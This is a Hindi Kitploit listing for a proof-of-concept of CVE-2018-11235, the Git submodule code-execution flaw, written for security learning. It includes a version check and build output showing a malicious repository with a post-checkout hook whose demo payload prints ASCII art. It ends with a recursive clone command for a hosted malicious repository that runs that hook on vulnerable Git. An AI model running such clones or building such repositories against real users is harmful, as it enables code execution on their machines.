Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-11235 — CVE-2018-11235(PoC && Exp) | Kitploit
उपकरण/GitHubGitHub/anonymking/cve-2018-11235
भेद्यता विश्लेषणशोषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubanonymking/cve-2018-11235

CVE-2018-11235

CVE-2018-11235(PoC && Exp)

रिपॉजिटरी देखें
147 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-11235

भेद्यता अवलोकन

  • भेद्यता का नाम: Git सुरक्षा भेद्यता
  • CNNVD आईडी: CNNVD-201805-1020
  • खतरा स्तर: उच्च
  • CVE आईडी: CVE-2018-11235
  • भेद्यता प्रकार: सुरक्षा सुविधा समस्या
  • प्रकाशन तिथि: 2018-05-31
  • खतरा प्रकार: दूरस्थ
  • अद्यतन तिथि: 2019-04-01
  • विक्रेता: git-scm
  • भेद्यता स्रोत:
  • भेद्यता सारांश: Git एक स्वतंत्र, खुला स्रोत वितरित संस्करण नियंत्रण प्रणाली है जिसे अमेरिकी सॉफ्टवेयर डेवलपर लिनस टॉर्वाल्ड्स (Linus Torvalds) द्वारा विकसित किया गया है। Git में एक सुरक्षा भेद्यता पाई गई है, जो इस कारण उत्पन्न होती है कि उप-मॉड्यूल नामों को $GIT_DIR/modules निर्देशिका के अंतर्गत जोड़ते समय, प्रोग्राम अविश्वसनीय .gitmodules फ़ाइलों से उप-मॉड्यूल नामों को सही ढंग से सत्यापित नहीं करता है। दूरस्थ हमलावर एक विशेष रूप से तैयार .gitmodules फ़ाइल का उपयोग करके इस भेद्यता का शोषण करके मनमाना कोड निष्पादित कर सकते हैं। निम्नलिखित संस्करण प्रभावित हैं: Git 2.13.7 से पहले के संस्करण, 2.14.4 से पहले के 2.14.x संस्करण, 2.15.2 से पहले के 2.15.x संस्करण, 2.16.4 से पहले के 2.16.x संस्करण, 2.17.1 से पहले के 2.17.x संस्करण।
  • प्रभावित संस्करण (स्रोत: Git मनमाना कोड निष्पादन भेद्यता का पता लगाना और सुधार (CVE-2018-11235)):
root@kitploit:~
संस्करण 2.13.x, 2.13.7 से कम, भेद्यता मौजूद है
संस्करण 2.14.x, 2.14.4 से कम, भेद्यता मौजूद है
संस्करण 2.15.x, 2.15.2 से कम, भेद्यता मौजूद है
संस्करण 2.16.x, 2.16.4 से कम, भेद्यता मौजूद है
संस्करण 2.17.x, 2.17.1 से कम, भेद्यता मौजूद है
  • अपने संस्करण की जाँच करें कि क्या यह प्रभावित है (स्रोत: Git मनमाना कोड निष्पादन भेद्यता का पता लगाना और सुधार (CVE-2018-11235)):
root@kitploit:~
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
टूल डाउनलोड करें
  1. यदि Initialized empty Git repository in /tmp/test/.git/ दिखाई देता है, तो भेद्यता मौजूद है।
  2. यदि निम्नलिखित पंक्तियाँ दिखाई देती हैं, तो संस्करण प्रभावित नहीं है:
root@kitploit:~
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules

भेद्यता पुनरुत्पादन

  • Github सुरक्षा तंत्र के कारण, दुर्भावनापूर्ण प्रोजेक्ट अपलोड नहीं किए जा सकते, इसलिए आप सीखने और परीक्षण के लिए स्थानीय रूप से इस प्रोजेक्ट का निर्माण करने के लिए स्क्रिप्ट build.sh चला सकते हैं।
  • इस प्रोजेक्ट का कार्यान्वयन मुख्य रूप से CVE-2018-11235-DEMO और CVE-2018-11235 प्रोजेक्ट्स पर आधारित है।
  • मेरे द्वारा उपयोग किया गया Git संस्करण git-2.12.1 है।
  • प्रक्रिया और परिणाम इस प्रकार हैं:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
 29 files changed, 560 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 Submodule
 create mode 100644 modules/1/2/3/4/payload/HEAD
 create mode 100644 modules/1/2/3/4/payload/config
 create mode 100644 modules/1/2/3/4/payload/description
 create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
 create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
 create mode 100644 modules/1/2/3/4/payload/index
 create mode 100644 modules/1/2/3/4/payload/info/exclude
 create mode 100644 modules/1/2/3/4/payload/logs/HEAD
 create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
 create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
 create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
 create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
 create mode 100644 modules/1/2/3/4/payload/packed-refs
 create mode 100644 modules/1/2/3/4/payload/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
 create mode 120000 modules/payload
 create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$ 
[anonymking@localhost test]$ 
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
  • मैंने payload में एक दुर्भावनापूर्ण कोड बनाया है जो एक बुद्ध की छवि प्रदर्शित करता है, इसलिए बुद्ध को देखने का अर्थ है कि परीक्षण सफल हुआ।

संदर्भ

  1. http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  2. https://www.anquanke.com/post/id/146909
  3. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  4. https://xz.aliyun.com/t/2371
  5. https://github.com/CHYbeta/CVE-2018-11235-DEMO
  6. https://atorralba.github.io/CVE-2018-11235/
  7. https://github.com/Rogdham/CVE-2018-11235

अप्रत्याशित खोज

  • मैंने Coding पर इस प्रोजेक्ट को सफलतापूर्वक बनाया है — CVE-2018-11235
  • उपयोग विधि:
root@kitploit:~
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test